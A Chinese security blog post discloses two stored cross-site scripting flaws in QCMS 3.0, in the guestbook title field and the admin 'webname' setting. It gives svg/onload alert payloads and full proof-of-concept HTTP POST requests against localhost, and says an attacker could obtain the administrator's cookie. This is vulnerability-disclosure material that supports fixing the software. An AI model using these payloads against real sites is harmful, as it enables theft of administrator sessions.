QCMS网站管理系统3.0几处XSS漏洞合集 - 颓废's Blog

QCMS网站管理系统3.0几处XSS漏洞合集

  • 内容
  • 相关

第一处

攻击者可以获得管理员的cookie

2.png


<svg/onload=alert(qcms)> 

1.png

POC



POST /guest/index.html HTTP/1.1
Host: localhost
Content-Length: 92
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Referer: http://localhost/guest/index.html
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESS49960de5880e8c687434170f6476605b=KyZyx79ethBmvgssXcM6DUdjHnnYxkfiw-86SorC64c; ly_main_nav_limit=15; lang=zh-cn; theme=default; bdshare_firstime=1519799317252; 
Connection: close
title=%3Csvg%2Fonload%3Dalert%28%27qcms%27%29%3E&name=test&email=test%40test.t&content=test
第二处


3.png


<svg/onload=alert(0)>
4.png



POST /backend/system.html HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://localhost/backend/system.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Cookie: PHPSESSID=8sqolv5pb9kfljuh5g0b36tus6; admin_id=1; admin_level=1; admin_name=admin; admin_secret=f63fad88029cf8f923c35fafe1c6b5d1; UM_distinctid=162181544af9-0ca6b89389a11d8-4c322172-1fa400-162181544b04ce;
Connection: close
Upgrade-Insecure-Requests: 1
webname=%3Csvg%2Fonload%3Dalert%280%29%3


本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360已收录] | [搜狗已收录]

本文链接:QCMS网站管理系统3.0几处XSS漏洞合集 - https://www.0dayhack.com/post-809.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注